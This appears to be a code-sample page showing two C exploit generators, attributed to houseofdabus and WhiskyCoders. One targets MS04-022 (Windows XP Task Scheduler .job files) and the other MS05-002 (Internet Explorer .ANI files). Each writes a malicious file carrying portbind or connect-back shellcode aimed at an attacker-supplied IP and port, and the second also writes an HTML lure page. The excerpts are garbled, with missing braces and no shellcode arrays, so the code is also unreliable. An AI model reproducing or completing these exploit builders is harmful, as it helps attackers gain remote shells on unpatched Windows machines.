Exemple #1
main(int argc, char **argv)
	unsigned short strlen;
	unsigned short port;
	unsigned long ip, sc;
	FILE *fp, *fp2;

	printf("\n(MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit\n\n");
	printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");

	if (argc < 4) usage(argv[0]);

	sc = atoi(argv[2]);
	if ( ((sc == 2) && (argc < 5)) || (sc > 2)) usage(argv[0]);

	fp = fopen(argv[1], "wb");
	if (fp == NULL) {
		printf("[-] error: can\'t create file: %s\n", argv[1]);

	/* header & garbage */
	fwrite(jobfile, 1, sizeof(jobfile)-1, fp);
	fseek(fp, 39*16, SEEK_SET);

	port = atoi(argv[3]);
	printf("[*] Shellcode: ");
	if (sc == 1) {
		SET_PORTBIND_PORT(portbindsc, htons(port));
		printf("Portbind, port = %u\n", port);
		fwrite(portbindsc, 1, sizeof(portbindsc)-1, fp);
		fwrite(endofjob, 1, 4, fp);
		fseek(fp, 70, SEEK_SET);
		/* calculate length (see header) */
		strlen = (sizeof(jobfile)-1-71+sizeof(portbindsc)-1+4)/2;
	else {
		ip = inet_addr(argv[4]);
		SET_CONNECTBACK_IP(connectbacksc, ip);
		SET_CONNECTBACK_PORT(connectbacksc, htons(port));
		printf("Connectback, port = %u, IP = %s\n", port, argv[4]);
		fwrite(connectbacksc, 1, sizeof(connectbacksc)-1, fp);
		fwrite(endofjob, 1, 4, fp);
		fseek(fp, 70, SEEK_SET);
		/* calculate length (see header) */
		strlen = (sizeof(jobfile)-1-71+sizeof(connectbacksc)-1+4)/2;

	printf("[*] Generate file: %s\n", argv[1]);
	fwrite(&strlen, 1, 2, fp);

return 0;
main(int argc, char **argv) 
FILE *fp; 
unsigned short port; 
unsigned long backip = 0;
unsigned char f[256+5] = ""; 
unsigned char anib[912] = ""; 
printf("\n(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit\n\n"); 
printf("\tCopyright (c) 2004-2005 :: WhiskyCoders :: \n\n\n"); 
printf("Tested on all affected systems:\n"); 
printf("   [+] Windows Server 2003\n   [+] Windows XP SP1, SP0\n"); 
printf("   [+] Windows 2000 All SP\n\n"); 
printf("%s\n\n", discl); 
if ( (sizeof(shellcode)-1) > (912-sizeof(aniheader)-3) ) { 
printf("[-] Size of shellcode must be <= 686 bytes\n"); 
return 0; 
if (argc < 3) usage(argv[0]); 
if (strlen(argv[1]) > 256) { 
printf("[-] Size of filename must be <=256 bytes\n"); 
return 0; 
/* creating ani file */ 
strcpy(f, argv[1]); 
strcat(f, ".ani"); 
printf("[*] Creating %s file ...", f); 
fp = fopen(f, "wb"); 
if (fp == NULL) { 
printf("\n[-] error: can\'t create file: %s\n", f); 
return 0; 
memset(anib, 0x90, 912); 
/* header */ 
memcpy(anib, aniheader, sizeof(aniheader)-1);

/* shellcode */ 
port = atoi(argv[2]); 
SET_CONNECTBACK_PORT(shellcode, fixx(port)); 

backip = inet_addr(argv[3]); 
SET_CONNECTBACK_IP(shellcode, backip); 

memcpy(anib+sizeof(aniheader)-1, shellcode, sizeof(shellcode)-1); 
fwrite(anib, 1, 912, fp); 
printf(" Ok\n"); 
/* creating html file */ 
f[0] = '\0'; 
strcpy(f, argv[1]); 
strcat(f, ".html"); 
printf("[*] Creating %s file ...", f); 
fp = fopen(f, "wb"); 
if (fp == NULL) { 
printf("\n[-] error: can\'t create file: %s\n", f); 
return 0; 
sprintf(anib, html, discl, argv[1]); 
fwrite(anib, 1, strlen(anib), fp); 
printf(" Ok\n"); 
return 0; 